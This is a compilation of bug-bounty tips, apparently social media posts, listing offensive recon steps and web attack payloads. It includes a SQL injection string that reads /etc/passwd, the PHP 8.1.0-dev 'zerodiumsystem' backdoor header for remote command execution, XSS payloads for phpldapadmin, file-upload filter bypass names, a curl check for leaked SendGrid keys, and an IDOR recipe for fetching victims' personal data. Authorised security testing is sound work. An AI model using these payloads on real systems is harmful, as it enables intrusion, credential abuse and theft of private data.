How to access to company without being part of it with google oauth, with your gmail account.. [it only works if the company has a misconfiguration!] #bugbountytips #bugbounty

http://xxxx/__clockwork/latest

I hate recon but here a good tip : 1 - Get the company IPs range X.X.X.X/24 2 - Run nmap -p 80,448,8080 IP/24 -oN file.txt 3 - Use any IP extractor or API in case of automation or bash then save it on IPs.txt 4- run httpx -l IPs.txt -o final.txt 5 - run nuclei -l final.txt

SenGird key starts with: SG.xxxxxxxxxxxx Curl command to create POC: curl -X "GET" "api.sendgrid.com/v3/scopes" -H "Authorization: Bearer SENDGRID_TOKEN-HERE" -H "Content-Type: application/json" _______ You can find it in mobile apps & js files #bugbountytips #BugBounty

Nice ways to leverage SQLI Injection to LFI and RCE LFI: item=&search='+Union+Select+1,2,3,4,5,6,load_file("/etc/passwd")# RCE: In the SS 🥰 Uploading a shell 🥰 #bugbounty #bugbountytips

If you find PHP 8.1.0-dev then try RCE & SQLi User-Agentt: zerodiumsleep(5); User-Agentt: zerodiumsystem('id'); #bugbounty #bugbountytips #rce #sqli

Add this endpoint for you wordlist phpldapadmin/index.php and try get default login and if there's no luck try this 2 XSSs domain/phpldapadmin/cmd.php domain/cmd.php 1/2 #bugbountytips #bugbountytip

cmd.php?cmd=template_engine&dn=%27%22()%26%25%3Czzz%3E%3CScRiPt%20%3Ealert(%27Orwa%27)%3C/ScRiPt%3E&meth=ajax&server_id=1 cmd.php?server_id=<script>alert('Orwa')</script> you can also try replace cmd.php to index.php 2/2 Happy hunting

Bug Bounty Tip File Upload Filter Bypass 🔹 file.html. 🔹 file.htm%6C 🔹 file.html; 🔹 file.html%00 🔹 file.html%20 🔹 file.html%23 🔹 file.html/ 🔹 file.html%0d%0a 🔹 file.html%2500 🔹 file.html%252e 🔹 file..html 🔹 file.tar.gz#file.html Cheers!

Intigriti Yes github.com/plenumlab/rce-…

Old but gold #bugbountytip add this for your world list .svn/entries or edit on the ready template github.com/projectdiscove… Ex: admin/.svn/entries next step if you locate the svn configuration use svn-extractor github.com/anantshri/svn-… start looking for bugs in the source

First Morning in #Ramadan ❤️🔥💪 #Tip : always try subdomain fuzzing, before 1 year ago I found RCE&SQLI in XXX[.]target[.]com Today I tried to FUZZ subdomain for this sub like XXXFUZZ[.]target[.]com and I found XXXtest1[.target.]com and it was the same backend :) #bugbountytips

check my new tools for #bugbounty its just came public now github.com/orwagodfather/… github.com/orwagodfather/… and dont forget to check my updated wordlists Thanks Security BSides Ahmedabad bugcrowd #bugbountytip #bugbountytips

Wildest auth bypass I’ve ever seen in my entire career! PHP+MySQL+[]= Recipe for BUGS! Auth bypass bugs are often simple;just try any wild idea that pops into your mind. You’re a hacker, and those ideas didn’t come from nowhere! #BugBounty #bugbountytips #bugbountytip #Bugcrowd

Exciting News: My Second Write-Up is Now Available! medium.com/@HX007/a-journ… Dive into the details of the bounty that ranks as the 3rd highest I’ve received on bugcrowd "A Journey of Limited Path Traversal To RCE With $40,000 Bounty!" Collaborated with Godfather Orwa 🇯🇴 , This

Last month, I was able to view millions of orders from well known coffee chain using a very simple but strange vulnerability. Here is how: 1/ Found a domain manage-bxy-orders.target.com with login and reset password page. Immediately knew this was meant for internal employees. 2/

Always check for ID’s disclosed in response: 1. Found a json POST request without user ID to fetch user information in the response 2. Adding new parameter “user_id”:<victims ID> in the request body 3. Victims full PII details fetched in response #bugcrowd #bugbountytips

🔐 Ultimate Secret Scanner Regex Collection 🔍 I've compiled 30+ regex patterns to detect leaked credentials: ✅ API keys (Google, AWS, Stripe) ✅ Auth tokens (OAuth, JWT) ✅ Private keys (RSA, PGP) ✅ Emails, URLs, UUIDs github.com/Lu3ky13/Search… #bugbounty #bugbountytip

config/databases.yml 😮